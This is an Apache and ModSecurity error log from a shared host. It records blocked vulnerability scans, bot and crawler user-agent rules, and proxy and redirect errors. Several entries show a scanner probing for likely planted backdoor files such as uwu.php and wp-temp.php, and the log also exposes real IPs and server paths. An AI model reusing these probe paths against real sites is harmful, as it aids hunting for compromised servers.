[Tue May 26 16:42:18.133026 2026] [security2:error] [pid 823496:tid 823702] [client 20.195.199.65:26049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/tires.php"] [unique_id "ahWAEpa08mrtyBNpA4PGMwAAAEo"]
[Tue May 26 16:42:18.133127 2026] [security2:error] [pid 823496:tid 823702] [client 20.195.199.65:26049] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/tires.php"] [unique_id "ahWAEpa08mrtyBNpA4PGMwAAAEo"]
[Tue May 26 16:42:18.168794 2026] [security2:error] [pid 817651:tid 817897] [client 52.248.43.121:49360] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "162.222.227.191"] [uri "/index.html"] [unique_id "ahWAEtlGRCPPN1dS2y2sTQAAAPk"]
[Tue May 26 16:42:18.675864 2026] [proxy:error] [pid 823496:tid 823704] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:18.675942 2026] [proxy_http:error] [pid 823496:tid 823704] [client 168.144.158.248:45778] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:18.676569 2026] [proxy:error] [pid 823496:tid 823704] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:18.676680 2026] [proxy_http:error] [pid 823496:tid 823704] [client 168.144.158.248:45778] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:18.788904 2026] [core:error] [pid 823496:tid 823746] [client 20.195.199.65:16414] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:42:18.788919 2026] [core:error] [pid 823496:tid 823746] [client 20.195.199.65:16414] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:42:18.789029 2026] [security2:error] [pid 823496:tid 823746] [client 20.195.199.65:16414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "dev.cicodev.org"] [uri "/dev/index.php"] [unique_id "ahWAEpa08mrtyBNpA4PGQAAAAHY"]
[Tue May 26 16:42:18.838396 2026] [security2:error] [pid 823496:tid 823722] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAD5a08mrtyBNpA4PGEQAAAF4"]
[Tue May 26 16:42:19.240586 2026] [proxy:error] [pid 823496:tid 823728] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:19.240682 2026] [proxy_http:error] [pid 823496:tid 823728] [client 168.144.158.248:45794] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.whitesun.in/
[Tue May 26 16:42:19.241572 2026] [proxy:error] [pid 823496:tid 823728] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:19.241619 2026] [proxy_http:error] [pid 823496:tid 823728] [client 168.144.158.248:45794] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.whitesun.in/
[Tue May 26 16:42:20.154882 2026] [security2:error] [pid 823496:tid 823708] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAEZa08mrtyBNpA4PGKwAAAFA"]
[Tue May 26 16:42:20.312733 2026] [security2:error] [pid 823496:tid 823682] [client 20.195.199.65:16439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/like.php"] [unique_id "ahWAFJa08mrtyBNpA4PGdwAAADY"]
[Tue May 26 16:42:20.312829 2026] [security2:error] [pid 823496:tid 823682] [client 20.195.199.65:16439] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/like.php"] [unique_id "ahWAFJa08mrtyBNpA4PGdwAAADY"]
[Tue May 26 16:42:20.348847 2026] [proxy:error] [pid 823496:tid 823739] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:20.348901 2026] [proxy_http:error] [pid 823496:tid 823739] [client 168.144.158.248:34536] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:20.349479 2026] [proxy:error] [pid 823496:tid 823739] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:20.349531 2026] [proxy_http:error] [pid 823496:tid 823739] [client 168.144.158.248:34536] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:21.205679 2026] [security2:error] [pid 823496:tid 823653] [client 20.195.199.65:31554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/.well-known/about.php"] [unique_id "ahWAFZa08mrtyBNpA4PGiAAAABk"]
[Tue May 26 16:42:21.205785 2026] [security2:error] [pid 823496:tid 823653] [client 20.195.199.65:31554] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/.well-known/about.php"] [unique_id "ahWAFZa08mrtyBNpA4PGiAAAABk"]
[Tue May 26 16:42:21.730933 2026] [security2:error] [pid 823496:tid 823676] [client 20.195.199.65:26074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWAFZa08mrtyBNpA4PGlAAAADA"]
[Tue May 26 16:42:21.731064 2026] [security2:error] [pid 823496:tid 823676] [client 20.195.199.65:26074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWAFZa08mrtyBNpA4PGlAAAADA"]
[Tue May 26 16:42:21.758315 2026] [security2:error] [pid 823496:tid 823632] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAE5a08mrtyBNpA4PGTwAAAAQ"]
[Tue May 26 16:42:22.348832 2026] [security2:error] [pid 823496:tid 823695] [client 20.195.199.65:21927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/bob.php"] [unique_id "ahWAFpa08mrtyBNpA4PGmgAAAEM"]
[Tue May 26 16:42:22.348955 2026] [security2:error] [pid 823496:tid 823695] [client 20.195.199.65:21927] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/bob.php"] [unique_id "ahWAFpa08mrtyBNpA4PGmgAAAEM"]
[Tue May 26 16:42:23.237415 2026] [security2:error] [pid 823496:tid 823637] [client 117.198.37.168:55256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAF5a08mrtyBNpA4PGsAAAAAk"]
[Tue May 26 16:42:23.237556 2026] [security2:error] [pid 823496:tid 823637] [client 117.198.37.168:55256] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAF5a08mrtyBNpA4PGsAAAAAk"]
[Tue May 26 16:42:23.384186 2026] [security2:error] [pid 817651:tid 817826] [client 20.195.199.65:26069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/t3s.php"] [unique_id "ahWAF9lGRCPPN1dS2y2sagAAALI"]
[Tue May 26 16:42:23.384309 2026] [security2:error] [pid 817651:tid 817826] [client 20.195.199.65:26069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/t3s.php"] [unique_id "ahWAF9lGRCPPN1dS2y2sagAAALI"]
[Tue May 26 16:42:23.741138 2026] [security2:error] [pid 823496:tid 823727] [client 216.244.66.241:40114] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/hulsteredbe/faaeac1332065.shtml"] [unique_id "ahWAF5a08mrtyBNpA4PGuAAAAGM"]
[Tue May 26 16:42:23.741278 2026] [security2:error] [pid 823496:tid 823727] [client 216.244.66.241:40114] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/hulsteredbe/faaeac1332065.shtml"] [unique_id "ahWAF5a08mrtyBNpA4PGuAAAAGM"]
[Tue May 26 16:42:23.944293 2026] [security2:error] [pid 823496:tid 823720] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAFpa08mrtyBNpA4PGmAAAAFw"]
[Tue May 26 16:42:24.033040 2026] [security2:error] [pid 823496:tid 823651] [client 114.119.152.231:42225] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/listen-on-spotify"] [unique_id "ahWAGJa08mrtyBNpA4PGvAAAABc"], referer: https://preetishah.com/listen-on-spotify
[Tue May 26 16:42:24.077796 2026] [autoindex:error] [pid 823496:tid 823631] [client 20.195.199.65:43896] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:24.078573 2026] [security2:error] [pid 823496:tid 823631] [client 20.195.199.65:43896] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAGJa08mrtyBNpA4PGuwAAAAM"]
[Tue May 26 16:42:24.266115 2026] [core:error] [pid 823496:tid 823656] [client 20.195.199.65:43896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:42:24.266134 2026] [core:error] [pid 823496:tid 823656] [client 20.195.199.65:43896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:42:24.266238 2026] [security2:error] [pid 823496:tid 823656] [client 20.195.199.65:43896] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "dev.cicodev.org"] [uri "/dev/index.php"] [unique_id "ahWAGJa08mrtyBNpA4PGvwAAABw"]
[Tue May 26 16:42:25.274349 2026] [autoindex:error] [pid 823496:tid 823659] [client 20.195.199.65:21923] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:25.275114 2026] [security2:error] [pid 823496:tid 823659] [client 20.195.199.65:21923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAGZa08mrtyBNpA4PGywAAAB8"]
[Tue May 26 16:42:25.457480 2026] [security2:error] [pid 823496:tid 823671] [client 20.195.199.65:21923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/uwu.php"] [unique_id "ahWAGZa08mrtyBNpA4PG0wAAACs"]
[Tue May 26 16:42:25.457682 2026] [security2:error] [pid 823496:tid 823671] [client 20.195.199.65:21923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/uwu.php"] [unique_id "ahWAGZa08mrtyBNpA4PG0wAAACs"]
[Tue May 26 16:42:25.740169 2026] [security2:error] [pid 823496:tid 823751] [client 14.172.96.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAF5a08mrtyBNpA4PGtQAAAHs"]
[Tue May 26 16:42:26.134743 2026] [security2:error] [pid 823496:tid 823712] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAF5a08mrtyBNpA4PGugAAAFQ"]
[Tue May 26 16:42:26.531140 2026] [security2:error] [pid 817651:tid 817799] [client 20.195.199.65:52313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/uwa.php"] [unique_id "ahWAGtlGRCPPN1dS2y2sfwAAAJc"]
[Tue May 26 16:42:26.531216 2026] [security2:error] [pid 817651:tid 817799] [client 20.195.199.65:52313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/uwa.php"] [unique_id "ahWAGtlGRCPPN1dS2y2sfwAAAJc"]
[Tue May 26 16:42:27.171528 2026] [proxy:error] [pid 823496:tid 823637] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:27.171603 2026] [proxy_http:error] [pid 823496:tid 823637] [client 168.144.158.248:44042] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.whitesun.in/
[Tue May 26 16:42:27.172201 2026] [proxy:error] [pid 823496:tid 823637] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:27.172233 2026] [proxy_http:error] [pid 823496:tid 823637] [client 168.144.158.248:44042] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.whitesun.in/
[Tue May 26 16:42:27.463542 2026] [security2:error] [pid 817651:tid 817869] [client 20.163.32.78:39336] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahWAG9lGRCPPN1dS2y2siQAAAN0"]
[Tue May 26 16:42:27.711229 2026] [security2:error] [pid 823496:tid 823719] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAGZa08mrtyBNpA4PG0AAAAFs"]
[Tue May 26 16:42:27.851821 2026] [security2:error] [pid 823496:tid 823708] [client 20.195.199.65:26067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/crgio.php"] [unique_id "ahWAG5a08mrtyBNpA4PG9gAAAFA"]
[Tue May 26 16:42:27.851965 2026] [security2:error] [pid 823496:tid 823708] [client 20.195.199.65:26067] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/crgio.php"] [unique_id "ahWAG5a08mrtyBNpA4PG9gAAAFA"]
[Tue May 26 16:42:28.647967 2026] [security2:error] [pid 823496:tid 823709] [client 20.195.199.65:16389] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/geforce.php"] [unique_id "ahWAHJa08mrtyBNpA4PG_wAAAFE"]
[Tue May 26 16:42:28.648089 2026] [security2:error] [pid 823496:tid 823709] [client 20.195.199.65:16389] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/geforce.php"] [unique_id "ahWAHJa08mrtyBNpA4PG_wAAAFE"]
[Tue May 26 16:42:29.365260 2026] [security2:error] [pid 823496:tid 823690] [client 20.195.199.65:43840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/pucci.php"] [unique_id "ahWAHZa08mrtyBNpA4PHCwAAAD4"]
[Tue May 26 16:42:29.365375 2026] [security2:error] [pid 823496:tid 823690] [client 20.195.199.65:43840] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/pucci.php"] [unique_id "ahWAHZa08mrtyBNpA4PHCwAAAD4"]
[Tue May 26 16:42:29.950794 2026] [autoindex:error] [pid 817651:tid 817791] [client 20.195.199.65:16430] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-includes/blocks/details/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:29.951419 2026] [security2:error] [pid 817651:tid 817791] [client 20.195.199.65:16430] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAHdlGRCPPN1dS2y2spwAAAI8"]
[Tue May 26 16:42:29.966010 2026] [security2:error] [pid 817651:tid 817786] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAG9lGRCPPN1dS2y2sjQAAAIo"]
[Tue May 26 16:42:30.074158 2026] [proxy:error] [pid 823496:tid 823633] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:30.074222 2026] [proxy_http:error] [pid 823496:tid 823633] [client 143.198.11.103:36286] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:30.074815 2026] [proxy:error] [pid 823496:tid 823633] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:30.074847 2026] [proxy_http:error] [pid 823496:tid 823633] [client 143.198.11.103:36286] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:30.165236 2026] [autoindex:error] [pid 817651:tid 817787] [client 20.195.199.65:16430] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-includes/blocks/audio/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:30.165865 2026] [security2:error] [pid 817651:tid 817787] [client 20.195.199.65:16430] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAHtlGRCPPN1dS2y2sqAAAAIs"]
[Tue May 26 16:42:30.257583 2026] [proxy:error] [pid 817651:tid 817782] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:30.257640 2026] [proxy_http:error] [pid 817651:tid 817782] [client 143.198.11.103:36296] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.d2cargo.com/
[Tue May 26 16:42:30.258309 2026] [proxy:error] [pid 817651:tid 817782] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:30.258357 2026] [proxy_http:error] [pid 817651:tid 817782] [client 143.198.11.103:36296] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.d2cargo.com/
[Tue May 26 16:42:30.356928 2026] [security2:error] [pid 817651:tid 817804] [client 20.195.199.65:16430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/one.php"] [unique_id "ahWAHtlGRCPPN1dS2y2srwAAAJw"]
[Tue May 26 16:42:30.357056 2026] [security2:error] [pid 817651:tid 817804] [client 20.195.199.65:16430] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/one.php"] [unique_id "ahWAHtlGRCPPN1dS2y2srwAAAJw"]
[Tue May 26 16:42:30.636832 2026] [proxy:error] [pid 817651:tid 817860] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:30.636880 2026] [proxy_http:error] [pid 817651:tid 817860] [client 143.198.11.103:36512] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:30.637500 2026] [proxy:error] [pid 817651:tid 817860] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:42:30.637541 2026] [proxy_http:error] [pid 817651:tid 817860] [client 143.198.11.103:36512] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:42:31.025133 2026] [security2:error] [pid 823496:tid 823685] [client 20.195.199.65:29830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-temp.php"] [unique_id "ahWAH5a08mrtyBNpA4PHJAAAADk"]
